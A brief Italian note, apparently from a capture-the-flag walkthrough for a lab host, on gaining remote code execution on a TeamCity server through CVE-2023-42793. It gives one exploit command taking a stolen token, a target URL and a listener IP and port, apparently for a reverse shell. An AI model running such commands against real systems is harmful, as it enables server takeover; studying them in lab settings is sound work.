
TeamCity RCE per Linux (CVE-2023-42793)
Dovrai prima ottenere il token utilizzando un exploit diverso. Tuttavia, il seguente exploit ti consentirà di ottenere RCE sul server Linux poiché codifica il payload nell'URL e lo invia al server.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT